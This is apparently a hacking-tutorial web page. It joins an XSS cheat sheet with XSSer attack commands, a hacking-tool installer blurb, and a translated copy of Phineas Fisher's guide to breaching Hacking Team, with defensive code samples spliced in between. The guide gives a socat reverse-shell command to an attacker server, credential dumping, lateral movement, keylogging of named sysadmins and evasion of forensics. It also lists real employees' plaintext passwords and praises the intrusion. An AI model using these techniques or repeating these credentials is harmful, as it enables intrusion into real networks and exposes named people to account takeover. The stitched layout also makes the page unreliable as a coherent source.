hackerbrother

Learn Penetration Testing And Ethical Hacking Online.


    XSS sheet

    This sheet discusses XSS attacks beyond the reflected and persistent types. It is intended to give a broader view of the possibilities within this class of attack and of the conditions required for them to occur. It also explores the operation of the XSSer tool for launching attacks of this type.


    Introduction

    Cross Site Scripting (XSS)

    • XSS vulnerabilities encompass any attack that allows scripting code to be executed in the context of another website.
    • They can be found in any application whose final objective is to present information in a web browser.
    • Usually, the input data used by the application is not correctly validated, which allows a malicious script to be sent to the application.
    • To function, they need an entry point, which is usually a form.
    • Through an XSS attack, you can hijack accounts, change user settings, access restricted parts of the site, modify site content, etc.

    Types of XSS attacks

    Direct Attacks
    • The direct XSS attack (also called persistent XSS) occurs when the attacker manages to embed malicious HTML code directly into websites that allow it.
    • It works by locating weaknesses in the HTML filters, if any exist, applied to published content.
    • This type of attack is usually the most common, and the attacker's code is based on HTML tags (of the type or
    • The result shows a window with the text "hello-world".
    • This vulnerability is usually used to steal sessions and for phishing.
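The following is an added example, not code from the original sheet: a minimal Python comment renderer in its vulnerable and hardened forms. It assumes a hypothetical stored-comment page; the comment strings are constructed, and the `alert("hello-world")` payload stands in for the proof-of-concept the text mentions. It shows where a persistent XSS comes from (user input concatenated into HTML), what output encoding does to it, and a header-based second line of defence.

```python
# Added example, not code from the original sheet: a minimal stored-comment
# renderer in vulnerable and hardened forms, showing where persistent XSS
# comes from and how output encoding and a CSP header close it.
import html
import re

# Constructed sample inputs: a harmless comment and the classic
# "hello-world" proof-of-concept alert the sheet describes.
BENIGN_COMMENT = "Nice article, thanks!"
POC_COMMENT = '<script>alert("hello-world")</script>'

# Any opening tag left in user-controlled output means markup got through.
_OPENING_TAG = re.compile(r"<\s*[a-zA-Z]")


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: the stored comment is concatenated into HTML as-is, so a
    comment containing markup reaches every visitor's browser as code."""
    return f'<li class="comment">{comment}</li>'


def render_comment_safe(comment: str) -> str:
    """Hardened: HTML-special characters are entity-encoded so the browser
    renders the comment as text, never as markup."""
    return f'<li class="comment">{html.escape(comment, quote=True)}</li>'


def render_page(comments: list[str], safe: bool = True) -> str:
    """Render the persistent comment list the way a server would on each page
    load; `safe` selects the renderer so both behaviours can be compared."""
    render = render_comment_safe if safe else render_comment_unsafe
    return "<ul>" + "".join(render(c) for c in comments) + "</ul>"


def user_content_carries_markup(page_html: str) -> bool:
    """Defender's check on the rendered page: strip the fixed template and
    report whether any user-supplied part still contains an opening tag."""
    body = page_html.replace("<ul>", "").replace("</ul>", "")
    for item in body.split("</li>"):
        if not item:
            continue
        user_part = item.removeprefix('<li class="comment">')
        if _OPENING_TAG.search(user_part):
            return True
    return False


def security_headers() -> dict[str, str]:
    """Defence in depth: a Content-Security-Policy without 'unsafe-inline'
    stops an inline <script> from running even if encoding is missed."""
    return {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    stored = [BENIGN_COMMENT, POC_COMMENT]
    for safe in (False, True):
        page = render_page(stored, safe=safe)
        print(f"safe={safe} carries_markup={user_content_carries_markup(page)}")
        print(page)
```

The check function is deliberately run on the rendered output rather than on the input: filtering input (the "HTML filter" approach the sheet describes) is what attackers work around, whereas encoding at the point of output is what makes the browser treat the comment as text regardless of what was stored.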


    XSSer DESCRIPTION

    It is a framework that allows you to:
    • Detect XSS vulnerabilities
    • Exploit these vulnerabilities locally or remotely.
    • Report the vulnerabilities found in real time.
    Its main features include:
    • Graphical interface
    • Dorking
    • Support for GET and POST (this is important since the tools covered in previous articles could only perform injections with GET).
    • Crawling
    • Proxy
    • Heuristic analysis
    • Preconfigured exploits
    • Export options
    • Different bypassers to evade filters
    Types of injection allowed:
    • Classic XSS (code execution in an embedded script)
    • Cookie injection
    • Cross Site "Agent" Scripting
    • Cross Site "Referer" Scripting
    • Injections in "Data Control Protocol" and "Document Object Model"
    • Induced HTTP Response Splitting


    EXAMPLES OF USE

    • Basic injection
    xsser -u "victima.com"
    • Automatic injection (test all vectors)
    xsser -u "victima.com" --auto
    • Injection with custom payload
    xsser -u "victima.com" --payload=">
    • Local exploitation
    xsser -u "victima.com" --Fp="
    • Remote exploitation
    xsser -u "victima.com" --Fr="
    • Use of dorking
    xsser -d "inurl:admin/echo" --De "google" --Fp="
    • Use of a proxy and HTTP Referer header spoofing
    xsser -u "victima.com" --proxy http://localhost:8118 --referer "666.666.666.666"
    • Use of hexadecimal encoding
    xsser -u "victima.com" --Hex
    • Multiple injection with 5 threads and encoding with mutation
    xsser -u "victima.com" --Cem --threads "5"
    • Use of the crawler with depth 3 and width 4 pages
    xsser -u "victima.com" -c3 --Cw=4
    • Exploitation through POST
    xsser -u "victima.com" -p "target_host=name&dns-lookup-php-submit-button=Lookup+DNS"

    XSSER GTK

    It is a somewhat more intuitive way to use XSSer.

    The tool is started with:

    xsser --gtk

    Thanks to the "Wizard Helper", guided operation can be carried out much more easily than from the command line.

    TYPES OF XSS ATTACKS

    When talking about XSS, the two most basic types usually come to mind: reflected and persistent.

    DOM XSS

    Takes advantage of modified active content to take control of the DOM, which allows controlling the flow of that object, but always through its API.

    XSF

    Uses the ActionScript language, used to program Flash applications, with the intention of loading unwanted elements into the page.

    CSRF

    An exploitation option that uses a second website to launch the attack against the vulnerable site.

    XFS

    Malicious code is injected into an iframe that is hidden inside the vulnerable website.

    XZS

    Achieves an escalation of zone privileges in Internet Explorer through a vulnerability.

    XAS

    Carries out the attack by modifying the value of the "User-Agent" header sent to a web application.

    XSSDoS

    Uses a for-loop inside a script embedded in the page to prevent users from accessing the content.

    Flash! Attack

    Another Flash-based attack that uses the Macromedia Flash plugin and ActiveX controls to inject malicious code.

    Induced XSS

    Unlike the other XSS attacks, this one is carried out on the server side.

    Image Scripting

    Exploits the reading of an image's binary parameters by a server that has not been adequately protected.

    GitHackTools - The best Hacking and PenTesting tools installer in the world

    About GitHackTools: GitHackTools is the best Hacking and PenTesting tools installer in the world. BruteDum can work with any Linux distro or Windows version if they support Python 3.



    Features of GitHackTools

    • Friendly command line interface
    • A huge number of hacking tools
    • Supports Windows and Linux, or other OS. Better support on Debian or Arch Linux
    • Move to another category with 1 command
    • ...

    GitHackTools installation on Linux
    You must install Python 3 and make first:

    • For Arch Linux and its distros: sudo pacman -S python3 make
    • For Debian and its distros: sudo apt install python3 make
    And then, open Terminal and enter this command:


    GitHackTools installation on Windows

    Download and run the Python 3.7.x setup file from Python.org. When installing Python 3.7, enable "Add Python 3.7 to PATH".

    Download and run the Git setup file from Git-scm.com and choose "Use Git from Windows Command Prompt".

    After that, open PowerShell or Command Prompt and enter these commands:

    If you don't want to install Git, you can download githacktools-master.zip, extract it and use it.

    GitHackTools screenshots: the GitHackTools home page on Parrot Security OS, Manjaro KDE and Windows 10; the A2SV installer on GitHackTools; the Metasploit installer on GitHackTools.


    Note: This tool may not install well with some tools on some Linux distros. Please tell me about your problems on Issues. Thanks!

    To-do list:
    • Add more tools.
    • Add more features and commands.
    • More friendly.
    • Fix bugs if they exist.
    • (Help me please)
    Phineas Fisher explains how he hacked Hacking Team



    Hacking Team's leak was worldwide news, but nobody knew much about the author or how he did it. That mystery has finally been revealed. After eight months of almost complete silence, Phineas Fisher, the pseudonym of the person who carried out the attack, has published a DIY (Do It Yourself) guide in Spanish with a detailed explanation of the tools and of how he broke the security of the company's systems and uncovered its best-kept secrets, such as some of its clients in Spain: the CNI, the Civil Guard and the Police.





    Hacking Team was a company that helped governments hack and spy on journalists, activists, political opponents, and other threats to their power, and, very occasionally, criminals and terrorists. Vincenzetti, the CEO, liked to end his emails with the fascist slogan "boia chi molla". "Boia chi vende RCS" would fit better. They also claimed to have technology to solve the "problem" of Tor and the darknet.



    Phineas Fisher sneaked into the Hacking Team network silently and leaked more than 400 gigabytes of data, but the guide also serves as a manifesto of his political ideals and of the motives behind the intrusion.

    Before, someone had to sneak into the offices to leak documents. A gun was needed to rob a bank. Today you can do it from bed with a laptop in your hands. As the CNT said after the hacking of Gamma Group: "we will try to take a step forward with new forms of struggle". Hacking is a powerful tool, let's learn and fight!

    At the end of the guide the author comments:

    And that's all it takes to bring down a company and end its human rights abuses. With only 100 hours of work, one person can undo years of work by a multi-million dollar company.

    In the guide, Phineas Fisher encourages others to follow his example.


    Phineas Fisher argued that leaking documents to expose corruption and abuse of power is really "ethical hacking", rather than doing consulting work for companies that are often the ones that really deserve to be hacked.

    Hacking Team is an Italian company that sells spyware and hacking services to police and intelligence services around the world. Over the years, researchers have documented several cases in which Hacking Team tools were used against journalists, dissidents, or activists. 

    On the night the hacker published the data, he revealed himself to be the same person who in 2014 also hacked Gamma International, a Hacking Team competitor that sells spyware called FinFisher.

    For months, however, a big question has gone unanswered: how did the hacker manage to breach and completely own a company whose business model depended precisely on hacking other people?

    At the time, the hacker promised that he would soon tell the world. He just wanted to wait a little while, he said on Twitter, until Hacking Team "had a little time to fail to figure out what happened and go out of business."

    In his guide, published on Friday, the hacker explained that he used an unknown vulnerability, or zero-day (0day), to obtain the first foothold in Hacking Team's internal network. Bearing in mind that the bug has not yet been patched, however, Phineas Fisher did not provide any details about what the vulnerability is exactly, or where he found it.

    After getting in, the hacker said he moved around carefully, first downloading emails, then accessing other servers and parts of the network. Having obtained administrative privileges within the company's main Windows network, Phineas Fisher said he spied on the system administrators, especially Christian Pozzi, since they generally have access to the entire network. After stealing Pozzi's passwords by recording his keystrokes, the hacker said he accessed and exfiltrated all of the company's source code, which is housed in a separate, isolated network.

    At that point, Hacking Team's Twitter password was reset with the "Forgot your password" function, and on July 5 he announced the hack using the company's own Twitter account.



    The hacker said that he was inside the Hacking Team network for six weeks, and that it took him about 100 hours of work to move around and get all the data. Judging by his words, it is clear that Phineas Fisher had a strong political motivation for the computer attack on Hacking Team.

    I want to dedicate this guide to the victims of the assault on the Armando Díaz school, and to all those whose blood was shed by Italian fascists.

    This refers to the bloody raid on the Italian school in Genoa in 2001, where police broke into a school lodging activists of the G-8 Genoa Social Forum, resulting in the arrest of 93 activists. The methods of the raid and the subsequent arrests, however, were so controversial that 125 policemen were brought to trial, accused of beating and torturing the detainees.

    The hacker also rejected being defined as a vigilante, and opted for a more political definition.

    "I characterize myself as an anarchist revolutionary, not as a vigilante," he said in an email. "Vigilantes act outside the system, but intend to carry out the work of the judicial system and the police, neither of which I am a fan of. I am clearly a criminal; it is not clear whether Hacking Team has done anything illegal. If anyone, Hacking Team are the vigilantes, who act on the margins out of their love for authority and law and order."

    Hacking gives the weakest the opportunity to fight and win.

    Hacking is a powerful tool. Let's learn and fight!

    He wrote, citing the anarcho-syndicalist union Confederación Nacional del Trabajo, or CNT. After Phineas Fisher hacked Gamma Group in 2014, the CNT said that technology was clearly just another front in the class struggle, and that it was time to "take a step forward" with "new forms of struggle".

    It is impossible to verify whether all the details in the guide are true, since neither Hacking Team nor the Italian authorities have disclosed everything related to the hack.

    "Any comments should come from the Italian law enforcement authorities who have been investigating the attack on Hacking Team, so there is no comment from the company," Hacking Team spokesman Eric Rabe said in an email. The Italian prosecutor's office could not be reached for comment.

    It is not clear how the investigation is going, but Phineas Fisher does not seem too concerned about whether he will be caught. In another section of his guide, he described Hacking Team as a company that helped governments spy on activists, journalists, political opponents, and "very occasionally" criminals and terrorists. The hacker also referred to Hacking Team's claims that it was developing technology to track criminals using the Tor network and the dark web.

    "But considering that I'm still free," he wrote snarkily, "I have doubts about its effectiveness."



    Introduction


    It often comes out in the news that an attack has been attributed to a group of government hackers (the "APTs") because they always use the same tools, leave the same footprints, and even use the same infrastructure (domains, emails, etc.). They are negligent because they can hack without legal consequences.

    I did not want to make the police's work easier by linking the Hacking Team hack with the hacks and nicknames of my daily work as a black hat hacker. So I used new servers and domains, registered with new emails and paid for with new bitcoin addresses. In addition, I only used public tools and things that I wrote specifically for this attack, and I changed my way of doing some things so as not to leave my usual forensic footprint.



    After the Gamma Group hack, I described a process for looking for vulnerabilities.

    Hacking Team has a public IP range:
    inetnum: 93.62.139.32 - 93.62.139.47
    descr: HT public subnet

    Hacking Team had very little exposed on the internet. For example, unlike Gamma Group, its customer support site needs a client certificate to connect. What it had was its main website (a Joomla blog where Joomscan does not reveal any serious flaws), a mail server, a couple of routers, two VPN devices, and a spam-filtering device. So I had three options:


    1. look for a 0day in Joomla,
    2. look for a 0day in postfix, or
    3. look for a 0day in one of the embedded systems.

    A 0day in an embedded system seemed to me the most achievable option, and after two weeks of reverse engineering work, I achieved a remote root exploit. Since the vulnerabilities have not yet been patched, I will not give more details.

    There is a lot of work and testing to do before using the exploit against Hacking Team.

    I wrote a backdoored firmware and compiled several post-exploitation tools for the embedded system. The backdoor serves to protect the exploit: using the exploit only once and then returning through the backdoor makes it harder to discover and patch the vulnerabilities.



    Tools used in the attack on Hacking Team

    The post-exploitation tools I had prepared were:

    1) busybox: for all the common UNIX utilities that the system does not have.
    2) nmap: to scan and fingerprint the internal Hacking Team network.
    3) Responder.py: the most useful tool for attacking Windows networks when you have access to the internal network but do not have a domain user.
    4) Python: to run Responder.py.
    5) tcpdump: to sniff traffic.
    6) dsniff: to sniff passwords of weak protocols like ftp, and to do arpspoofing. I wanted to use ettercap, written by the same ALoR and NaGA from Hacking Team, but it was difficult to compile it for the system.
    7) socat: for a comfortable shell with a pty. On my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port and on the hacked system: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:my_server:my_port. And for many more things; it's a Swiss army knife. See the examples section of its documentation.
    8) screen: like the pty of socat, it is not strictly necessary, but I wanted to feel at home in the Hacking Team networks.
    9) a SOCKS proxy server: to use together with proxychains to access the internal network with any other program.
    10) tgcd: to forward ports, like the SOCKS server, through the firewall.

    The worst that could happen was that my backdoor or post-exploitation tools would leave the system unstable and cause an employee to investigate it. Therefore, I spent a week testing my exploit, backdoor, and post-exploitation tools on the networks of other vulnerable companies before entering the Hacking Team network.

    NoSQL database

    NoSQL, or rather NoAuthentication, has been a great gift to the hacker community. Just when I was worried that they had finally patched all the authentication-bypass bugs in MySQL [2] [3] [4] [5], new databases come into fashion without authentication by design. Nmap finds a few on the internal network of Hacking Team:

    27017/tcp open mongodb MongoDB 2.6.5
    | mongodb-databases:
    |   ok = 1
    |   totalSizeMb = 47547
    |   totalSize = 49856643072
    ...
    |_  version = 2.6.5

    27017/tcp open mongodb MongoDB 2.6.5
    | mongodb-databases:
    |   ok = 1
    |   totalSizeMb = 31987
    |   totalSize = 33540800512
    |   databases
    ...
    |_  version = 2.6.5

    They were the databases of RCS test instances. The audio that RCS records is stored in MongoDB with GridFS. The audio folder in the torrent [6] comes from there. They spied on themselves unintentionally.

    Although it was fun to listen to recordings and see webcam images of Hacking Team developing their malware, it was not very useful. Their insecure backups were the vulnerability that opened their doors. According to their documentation [1], their iSCSI devices should be on a separate network, but nmap finds some in their subnet 192.168.1.200/24:

    Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
    ...
    3260/tcp open iscsi?
    | iscsi-info:
    |   Target: iqn.2000-01.com.synology:ht-synology.name
    |     Address: 192.168.200.66:3260,0
    |_    Authentication: No authentication required

    Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
    ...
    3260/tcp open iscsi?
    | iscsi-info:
    |   Target: iqn.2000-01.com.synology:synology-backup.name
    |     Address: 10.0.1.72:3260,0
    |     Address: 192.168.200.72:3260,0
    |_    Authentication: No authentication required

    and we find backup copies of several virtual machines. The Exchange server seems the most interesting. It's too big to download, but we can mount it remotely and look for interesting files:

    $ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
    $ fdisk -l /dev/loop0
    /dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT

    then the offset is 2048 * 512 = 1048576

    $ losetup -o 1048576 /dev/loop1 /dev/loop0
    $ mount -o ro /dev/loop1 /mnt/exchange/

    now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
    we find the virtual machine's hard disk, and mount it:

    vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
    mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

    ... and finally we have unpacked the Russian doll and can see all the files of the old Exchange server in /mnt/part1
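As an added example (not part of the guide), the following Python script parses nmap output of the shape quoted above and flags services that answer without credentials, which is the kind of check an internal asset review would run over its own scan results before an intruder does. The scan text, hostnames, target names and addresses are constructed placeholders; the third host is a control case that should not be flagged.

```python
# Added example, not part of the guide: parse nmap service-script output and
# flag services reachable without credentials (MongoDB answering a database
# listing, iSCSI targets with no authentication). The scan text below is
# constructed; hostnames, IQNs and addresses are placeholders.
import re
from dataclasses import dataclass

SAMPLE_SCAN = """\
Nmap scan report for db-test.example.internal (10.10.20.5)
27017/tcp open  mongodb  MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|   totalSize = 49856643072
|_  version = 2.6.5

Nmap scan report for nas-backup.example.internal (10.10.20.72)
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.example:nas-backup.name
|     Address: 10.10.20.72:3260,0
|_    Authentication: No authentication required

Nmap scan report for nas-secure.example.internal (10.10.20.73)
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.example:nas-secure.name
|     Address: 10.10.20.73:3260,0
|_    Authentication: CHAP (constructed control case)
"""


@dataclass(frozen=True)
class Finding:
    host: str
    ip: str
    port: int
    service: str
    reason: str


_HOST = re.compile(r"^Nmap scan report for (\S+) \((\d+\.\d+\.\d+\.\d+)\)")
_PORT = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s+(\S+)")
# Script output lines start with "| " or "|_" followed by indentation.
_SCRIPT = re.compile(r"^\|[_ ]\s*(\S.*)$")


def find_unauthenticated_services(scan_text: str) -> list[Finding]:
    """Walk the scan line by line, remembering the current host and port, and
    emit a Finding whenever a script result shows the service gave something
    away without credentials."""
    findings: list[Finding] = []
    host = ip = None
    port = service = None
    in_mongo_listing = False
    for raw in scan_text.splitlines():
        line = raw.rstrip()
        m = _HOST.match(line)
        if m:
            host, ip = m.groups()
            port = service = None
            in_mongo_listing = False
            continue
        m = _PORT.match(line)
        if m:
            port, service = int(m.group(1)), m.group(2).rstrip("?")
            in_mongo_listing = False
            continue
        m = _SCRIPT.match(line)
        if not m or port is None:
            continue
        body = m.group(1).strip()
        if body.startswith("mongodb-databases:"):
            # The listDatabases command only succeeds ("ok = 1") when the
            # server accepted an unauthenticated connection.
            in_mongo_listing = True
            continue
        if in_mongo_listing and body.replace(" ", "") == "ok=1":
            findings.append(Finding(host, ip, port, service,
                                    "database list readable without credentials"))
            in_mongo_listing = False
            continue
        if body.lower().startswith("authentication:") and \
                "no authentication required" in body.lower():
            findings.append(Finding(host, ip, port, service,
                                    "iSCSI target exposes LUNs without authentication"))
    return findings


if __name__ == "__main__":
    for f in find_unauthenticated_services(SAMPLE_SCAN):
        print(f"{f.host} ({f.ip}) {f.port}/{f.service}: {f.reason}")
```

Feeding the real `nmap -sV --script mongodb-databases,iscsi-info` output of an internal range into this parser gives a short list of hosts whose storage is readable by anyone on the segment; in the guide those were exactly the systems that yielded the backups, so they are the ones a defender wants isolated or put behind authentication first.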

    What were the passwords of the Hacking Team administrators?

    What interests me most about the backup is to find out whether it has a password or hash that I can use to access the current server. I use pwdump, cachedump, and lsadump [1] on the registry files. lsadump finds the password of the besadmin service account:

    _SC_BlackBerry MDS Connection Service
    0000  16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0010  62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00  b.e.s.3.2.6.7.8.
    0020  21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00  !.!.!...........

    I use proxychains [2] with the SOCKS server on the embedded system and smbclient [3] to check the password:

    proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'

    It works! The besadmin password is still valid, and it is a local administrator. I use my proxy and psexec_psh from metasploit [4] to get a meterpreter session. Then I migrate to a 64-bit process, "load kiwi" [5], "creds_wdigest", and I already have many passwords, including the domain administrator's password.

    Hacking Team employees' passwords were:

    HACKINGTEAM BESAdmin bes32678 !!! 
    HACKINGTEAM Administrator uu8dd8ndd12! 
    HACKINGTEAM c.pozzi P4ssword 
    HACKINGTEAM m.romeo ioLK / (90 
    HACKINGTEAM l. War 4luc@=.= 
    HACKINGTEAM d.martinez W4tudul3sp 
    HACKINGTEAM g.russo GCBr0s0705! 
    HACKINGTEAM a.scarafile Cd4432996111 
    HACKINGTEAM r.viscardi Ht2015! 
    HACKINGTEAM a.mino A! e $$ andra 
    HACKINGTEAM m.bettini Ettore & Bella0314 
    HACKINGTEAM m.luppi Blackou7 
    HACKINGTEAM s.gallucci 1S9i8m4o! 
    HACKINGTEAM d.milan set! dob66 
    HACKINGTEAM w.furlan Blu3.B3rry! 
    HACKINGTEAM d.romualdi Rd13136f @ # 
    HACKINGTEAM l.invernizzi L0r3nz0123! 
    HACKINGTEAM e .ciceri 2O2571 & 2E
    HACKINGTEAM e.rabe erab @ 4HT!
    Special mention for Christian Pozzi's password: P

    Introduction to Windows Domain Hacking

    I will give a brief review of the techniques for spreading within a Windows network. The remote techniques require the password or hash of a local administrator on the target. By far the most common way to get these credentials is to use mimikatz [1], especially sekurlsa::logonpasswords and sekurlsa::msv, on computers where you already have administrative access. The "in situ" movement techniques also require administrative privileges (except for runas). The most important tools for privilege escalation are PowerUp [2] and bypassuac [3].

    Remote movement:

    1) psexec

    The basic and proven way of moving within Windows networks. You can use psexec [1], winexe [2], psexec_psh from metasploit [3], invoke_psexec from PowerShell Empire [4], or the Windows command "sc" [5]. For the metasploit module, PowerShell Empire, and pth-winexe [6], it is enough to know the hash without knowing the password. It is the most universal way (it works on any computer with port 445 open), but also the least cautious one. Event 7045 "Service Control Manager" will appear in the event log. In my experience, they have never noticed it during a hack, but sometimes they notice it later and it helps investigators understand what the hacker has done.

    2) WMI

    The most cautious way. The WMI service is enabled on all Windows computers, but except for servers, the firewall blocks it by default. You can use wmiexec.py [7], pth-wmis [6] (here there is a demonstration of wmiexec and pth-wmis [8]), invoke_wmi from PowerShell Empire [9], or the Windows command wmic [5]. All except wmic need only the hash.

    3) PSRemoting [10]

    It is disabled by default, and I do not advise you to enable new protocols that are not necessary. But if the sysadmin has already enabled it, it is very convenient, especially if you use PowerShell for everything (and yes, you should use PowerShell for almost everything; that is going to change [11] with PowerShell 5 and Windows 10, but nowadays PowerShell makes it easy to do everything in RAM, dodge antivirus, and leave few traces).

    4) Scheduled tasks

    Remote programs can be executed with at and schtasks [5]. It works in the same situations as psexec, and also leaves known traces [12].

    5) GPO

    If all these protocols are disabled or blocked by the firewall, once you are the domain administrator, you can use GPO to push a logon script, install an msi, execute a scheduled task [13], or, as we will see with the computer of Mauro Romeo (sysadmin of Hacking Team), enable WMI and open the firewall through GPO.
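As an added example (not part of the guide), the following Python script shows triage logic for the trace mentioned under psexec: Event ID 7045, "A service was installed in the system", written to the Windows System log by the Service Control Manager. The event records are constructed here as dictionaries in the shape a log export would give; computer names, service names and image paths are placeholders, and the rules are heuristics a defender tunes against their own environment rather than a complete signature set.

```python
# Added example, not part of the guide: triage of Windows Event ID 7045
# (service installed) records for the patterns remote-execution tools leave.
# The records are constructed; names and paths are placeholders.
import re

SAMPLE_EVENTS = [
    # Ordinary vendor service install: should not fire.
    {"EventID": 7045, "Computer": "ws01.example.internal",
     "ServiceName": "Vendor Update Helper",
     "ImagePath": r"C:\Program Files\Vendor\updhelper.exe",
     "AccountName": "LocalSystem", "StartType": "auto start"},
    # Sysinternals PsExec installs its own fixed-name service on the target.
    {"EventID": 7045, "Computer": "ws02.example.internal",
     "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe",
     "AccountName": "LocalSystem", "StartType": "demand start"},
    # Random service name wrapping an encoded PowerShell one-liner.
    {"EventID": 7045, "Computer": "srv01.example.internal",
     "ServiceName": "kQzLmWpx",
     "ImagePath": r"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -enc SQBFAFgA",
     "AccountName": "LocalSystem", "StartType": "demand start"},
    # Binary dropped through the ADMIN$ share and registered as a service.
    {"EventID": 7045, "Computer": "srv02.example.internal",
     "ServiceName": "svcsync",
     "ImagePath": r"\\127.0.0.1\ADMIN$\svcsync.exe",
     "AccountName": "LocalSystem", "StartType": "demand start"},
    # Not a service-install event: ignored regardless of content.
    {"EventID": 7036, "Computer": "srv02.example.internal",
     "ServiceName": "svcsync", "ImagePath": "", "AccountName": "", "StartType": ""},
]


def rule_psexec_service(e: dict) -> bool:
    """PsExec's service name and binary name are fixed and well known."""
    return "PSEXESVC" in (e["ServiceName"] + e["ImagePath"]).upper()


def rule_encoded_powershell(e: dict) -> bool:
    """A service whose image path is an encoded PowerShell command is the
    pattern left by PowerShell-based psexec-style modules."""
    return re.search(r"powershell.*\s-(enc|e|encodedcommand)\b",
                     e["ImagePath"], re.I) is not None


def rule_admin_share_binary(e: dict) -> bool:
    """Service binary referenced through an ADMIN$ or C$ UNC path instead
    of a local install directory."""
    return re.search(r"\\\\[^\\]+\\(ADMIN|C)\$\\", e["ImagePath"], re.I) is not None


def rule_random_service_name(e: dict) -> bool:
    """Heuristic: an 8-letter mixed-case name with no words in it, as some
    remote-execution tools generate."""
    name = e["ServiceName"]
    return (re.fullmatch(r"[A-Za-z]{8}", name) is not None
            and any(c.islower() for c in name) and any(c.isupper() for c in name))


RULES = {
    "psexec_service": rule_psexec_service,
    "encoded_powershell": rule_encoded_powershell,
    "admin_share_binary": rule_admin_share_binary,
    "random_service_name": rule_random_service_name,
}


def triage_service_installs(events: list[dict]) -> list[dict]:
    """Return one alert per 7045 event that matches at least one rule, with
    the names of the rules that fired, so an analyst can pivot to the host."""
    alerts = []
    for e in events:
        if e.get("EventID") != 7045:
            continue
        fired = [name for name, rule in RULES.items() if rule(e)]
        if fired:
            alerts.append({"Computer": e["Computer"], "ServiceName": e["ServiceName"],
                           "ImagePath": e["ImagePath"], "rules": fired})
    return alerts


if __name__ == "__main__":
    for alert in triage_service_installs(SAMPLE_EVENTS):
        print(alert["Computer"], alert["ServiceName"], ",".join(alert["rules"]))
```

The text notes that this event is rarely noticed at the time and only helps later; the point of collecting 7045 centrally and running even simple rules like these over it is to turn it from a post-incident clue into a near-real-time alert, with the random-name heuristic being the one most likely to need per-environment tuning.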

    Movement "in situ":

    1) Impersonating tokens

    Once you have administrative access to a computer, you can use the tokens of other users to access resources in the domain. Two tools for this are incognito [1] and the token::* commands of mimikatz [2].

    2) MS14-068

    A validation flaw in Kerberos can be used to generate a domain administrator ticket [3] [4] [5].

    3) Pass the hash

    If you have a user's hash but the user does not have a session open, you can use sekurlsa::pth [2] to get a ticket for the user.

    4) Process injection

    Any RAT can be injected into another process, for example with the migrate command in meterpreter and pupy [6] or psinject [7] in PowerShell Empire. You can inject into the process that has the token you want.

    5) runas

    This is sometimes very useful because it does not require administrator privileges. The command is part of Windows, but if you do not have a graphical interface you can use PowerShell [8].


    Persistence: maintaining access

    Once you have access, you want to keep it. Actually, persistence is only a challenge for bastards like those of Hacking Team who want to hack activists or other individuals. To hack companies, you do not need persistence because companies never sleep. I always use "persistence" like Duqu 2: running in RAM on a couple of servers with high uptime. In the hypothetical case that they all restart at the same time, I have passwords and a golden ticket [1] for backup access. You can read more about the persistence mechanisms for Windows here [2] [3] [4]. But to hack companies, it is not necessary, and it increases the risk of detection.



    The best tool today for understanding Windows networks is PowerView [1]. It is worth reading everything written by its author [2], above all [3], [4], [5], and [6]. PowerShell itself is also very powerful [7]. As there are still many 2003 and 2000 servers without PowerShell, you also have to learn the old school [8], with tools like netview.exe [9] or the Windows command "net view". Other techniques that I like are:

    1) Download a list of file names

    With a domain administrator account, you can download all the file names on the network with PowerView:

    Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
    select-string '^(.*)\t-' | %{dir -recurse $_.Matches[0].Groups[1] |
    select fullname | out-file -append files.txt}

    Later, you can read it at your own pace and choose which ones you want to download.

    2) Read emails

    As we have seen, you can download emails with PowerShell, and they have a lot of useful information.

    3) Read SharePoint

    It is another place where many companies keep important information. It can be downloaded with PowerShell [10].

    4) Active Directory [11]

    It has a lot of useful information about users and computers. Without being a domain administrator, you can already find a lot of information with PowerView and other tools [12]. After getting domain administrator, you should export all the AD information with csvde or another tool.

    5) Spy on employees

    One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi (sysadmin of Hacking Team) got me access to the Nagios server, which gave me access to the rete sviluppo (the development network with the RCS source code). With a simple combination of Get-Keystrokes and Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang [14], and GPO, you can spy on any employee or even the entire domain.

    When I read the documentation of their infrastructure [1], I realized that I still lacked access to something important: the "Rete Sviluppo", an isolated network that stores all the source code of RCS. The sysadmins of a company always have access to everything. I searched the computers of Mauro Romeo and Christian Pozzi to see how they managed the sviluppo network, and to see whether there were other interesting systems that I should investigate. It was easy to access their computers since they were part of the Windows domain where I already had admin. Mauro Romeo's computer had no open ports, so I opened the WMI port [2] to run meterpreter [3]. In addition to recording keystrokes and screenshots with Get-Keystrokes and Get-TimedScreenshot, I used many of metasploit's /gather/ modules, CredMan.ps1 [4], and searched for files [5]. When I saw that Pozzi had a Truecrypt volume, I waited until he had mounted it and then copied the files. Many have laughed at Christian Pozzi's weak passwords (and Christian Pozzi in general offers enough material for comedy [6] [7] [8] [9]). I included them in the leak as a distraction and to laugh at him. The reality is that mimikatz and keyloggers see all passwords the same.

